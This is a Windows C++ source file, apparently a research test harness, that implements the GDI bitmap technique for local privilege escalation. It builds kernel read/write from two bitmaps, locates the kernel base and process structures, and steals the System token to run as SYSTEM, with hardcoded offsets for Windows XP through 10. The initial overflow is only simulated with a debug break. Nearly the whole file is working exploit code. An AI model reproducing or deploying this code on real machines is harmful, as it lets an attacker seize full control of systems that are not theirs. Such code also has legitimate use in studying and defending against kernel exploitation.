// bitmapspraytest.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "RESOURCE.h"
#include <Windows.h>
#include <Windowsx.h>
#include <Winternl.h>
#include <Commctrl.h>
#include <intrin.h>

HWND ghWndList;

ULONG64 gMemAddress = 0;

HBITMAP gWorkerHandle = 0;
HBITMAP gManagerHandle = 0;

void dprint(char *format, ...)
{
	va_list args;
	va_start(args, format);
	char __buffer[0x10000];

	memset(&__buffer, 0, sizeof(__buffer));

	vsprintf((char *)__buffer, format, args);
	ListBox_AddString(GetDlgItem(ghWndList, IDC_OUTLIST), __buffer);
	va_end(args);
}

typedef struct _VersionSpecificConfig
{
	DWORD UniqueProcessIdOffset;
	DWORD TokenOffset;
} VersionSpecificConfig;

VersionSpecificConfig gConfig;


// address register
void SetAddress(ULONG64 addr)
{
	ULONG64 writebuf[2] = {addr, addr};
	SetBitmapBits(gManagerHandle, sizeof(writebuf), &writebuf);
}

BOOL WriteVirtual(ULONG64 dest, BYTE *src, DWORD len)
{
	SetAddress(dest);
	SetBitmapBits(gWorkerHandle, len, src);
	return TRUE;
}

BOOL ReadVirtual(ULONG64 src, BYTE *dest, DWORD len)
{
	SetAddress(src);
	GetBitmapBits(gWorkerHandle, len, dest);
	return TRUE;
}

#pragma pack(push)
#pragma pack(1)
typedef struct {
	WORD limit;
	ULONG64 base;
} IDTR;

typedef union _KIDTENTRY64 {
   struct {
       USHORT OffsetLow;
       USHORT Selector;
       USHORT IstIndex : 3;
       USHORT Reserved0 : 5;
       USHORT Type : 5;
       USHORT Dpl : 2;
       USHORT Present : 1;
       USHORT OffsetMiddle;
       ULONG OffsetHigh;
       ULONG Reserved1;
   };
 
   ULONG64 Alignment;
} KIDTENTRY64, *PKIDTENTRY64;

#pragma pack(pop)

ULONG64 GetNtBase()
{
	IDTR idtbase;
	__sidt(&idtbase);
	KIDTENTRY64 idtEntry;

	dprint("idt base %016I64x", idtbase.base);

	// get first idt entry
	ReadVirtual(idtbase.base, (BYTE *)&idtEntry, sizeof(KIDTENTRY64));

	ULONG64 probestartaddress = ((ULONG64)(idtEntry.OffsetHigh) << 32) | ((ULONG64)(idtEntry.OffsetMiddle) << 16) | (idtEntry.OffsetLow);
	probestartaddress &= 0xfffffffffffff000;

	int tries=0;

	BYTE dosheader[4];

	if(probestartaddress < 0xff00000000000000)
		return 0;

	// reckless!!
	while(TRUE) {
		// search ntkrnl base address
		ReadVirtual(probestartaddress, (BYTE *)&dosheader, 4);
		if((dosheader[0] == 'M') && (dosheader[1] == 'Z')) {
			break;
		}
		probestartaddress-= 0x1000;
	}
	return probestartaddress;
}

// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
	ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
	ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
	FreeLibrary((HMODULE)ntos);
	ULONG64 res = 0;
	ULONG64 ntbase = GetNtBase();
	if(ntbase)
		ReadVirtual(addr - ntos + ntbase, (BYTE *)&res, sizeof(ULONG64));
	return res;
}

// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess(ULONG64 pSystemEPROCESS)
{
	ULONG64 pEPROCESS = pSystemEPROCESS;
	if(!pEPROCESS)
		return 0;
	
	// walk ActiveProcessLinks until we find our Pid
	LIST_ENTRY ActiveProcessLinks;	
	ReadVirtual(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));

	ULONG64 res = 0;

	while(TRUE)	{
		ULONG64 UniqueProcessId = 0;

		// adjust EPROCESS pointer for next entry
		pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
		// get pid
		ReadVirtual(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
		// is this our pid?
		if(GetCurrentProcessId() == UniqueProcessId) {
			res = pEPROCESS;
			break;
		}
		// get next entry
		ReadVirtual(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));

		if(pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink)- gConfig.UniqueProcessIdOffset - sizeof(ULONG64))	// if next same as last, we reached the end
			break;
	}
	return res;
}


INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam, LPARAM lParam)
{
	switch(uMsg)
	{
		case WM_INITDIALOG:
			{
				BYTE buf[100*100*4] = "pnx!\x00";
				ghWndList  = hwndDlg;

				char username[0x100];
				DWORD ln = 0x100;

				GetUserName(username, &ln);
				dprint("User: %s", username);

				gManagerHandle = CreateBitmap(0x64, 0x64, 1, 32, &buf);
				dprint("gManagerHandle: %x", gManagerHandle);

				gWorkerHandle = CreateBitmap(0x63, 0x64, 1, 32, &buf);
				dprint("gWorkerHandle: %x", gWorkerHandle);
			}
			break;

		case WM_CLOSE:
			SendMessage(hwndDlg, WM_COMMAND, IDCANCEL, 0);
			break;

		case WM_COMMAND:
			{
				WORD id = LOWORD(wParam);
				WORD evt = HIWORD(wParam);
				switch(id)
				{
				case IDBREAK:
					{
						// simulate overflow by changing gManagerHandle->pvScan0 to &gWorkerHandle->pvScan0
						__debugbreak() ;

						// get System EPROCESS
						ULONG64 SystemEPROCESS = PsInitialSystemProcess();
						
						ULONG64 CurrentEPROCESS  = 0;
						if(SystemEPROCESS) {
							// get current EPROCESS
							CurrentEPROCESS = PsGetCurrentProcess(SystemEPROCESS);
						}

						if(SystemEPROCESS && CurrentEPROCESS) {
							dprint("System EPROCESS at %016I64x", SystemEPROCESS);
							dprint("Current EPROCESS at %016I64x", CurrentEPROCESS);

							ULONG64 SystemToken;

							// read token from system process
							ReadVirtual(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, sizeof(ULONG64));

							// write token to current process
							WriteVirtual(CurrentEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, sizeof(ULONG64));

							char username[0x100];
							DWORD ln = 0x100;

							GetUserName(username, &ln);
							dprint("User: %s", username);

							// done. we're System brah... :)
						}
					}
					break;

				case IDCANCEL:
					DeleteObject(gManagerHandle);
					DeleteObject(gWorkerHandle);
					EndDialog(hwndDlg, 0);
					PostQuitMessage(0);
					break;

				default:
					break;
				}
			}
			break;

		default:
			return FALSE;
	}
	return TRUE;
}

#define VersionSplit(maj, min, Server, Workstation) \
	if((vi.dwMajorVersion == ##maj##) && (vi.dwMinorVersion == ##min##)) {\
		if(vi.wProductType != VER_NT_WORKSTATION)\
			gConfig = ##Server##;\
		else\
			gConfig = ##Workstation##;\
	}\


void AutoConfig()
{
	OSVERSIONINFOEX vi;
	vi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

	GetVersionEx((LPOSVERSIONINFOA)&vi);

	VersionSpecificConfig W2003R2X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W2008X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W2008R2X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W2012X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W2012R2X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W2016X64Config = { 0x2e8, 0x358};

	VersionSpecificConfig WXPX64Config = { 0x2e0, 0x348};
	VersionSpecificConfig WVistaX64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W7X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W8X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W81X64Config = { 0x2e0, 0x348};
	VersionSpecificConfig W10X64Config = { 0x2e8, 0x358};

	VersionSplit(5, 2, W2003R2X64Config, WXPX64Config)
	else
		VersionSplit(6, 0, W2008X64Config, WVistaX64Config)
	else
		VersionSplit(6, 1, W2008R2X64Config, W7X64Config)
	else
		VersionSplit(6, 2, W2012X64Config, W8X64Config)
	else
		VersionSplit(6, 3, W2012R2X64Config, W81X64Config)
	else
		VersionSplit(10, 0, W2016X64Config, W10X64Config)

}

int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{

	AutoConfig();

	InitCommonControls();

	CreateDialog(hInstance,  MAKEINTRESOURCE(IDD_DIALOG), NULL, &DialogProc);

	BOOL bRet;
	MSG msg;

	while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) 
	{ 
		if (bRet == -1)
		{
			return bRet;
		}
		else
		{ 
			TranslateMessage(&msg); 
			DispatchMessage(&msg); 
		} 
	} 

	return 0;
}
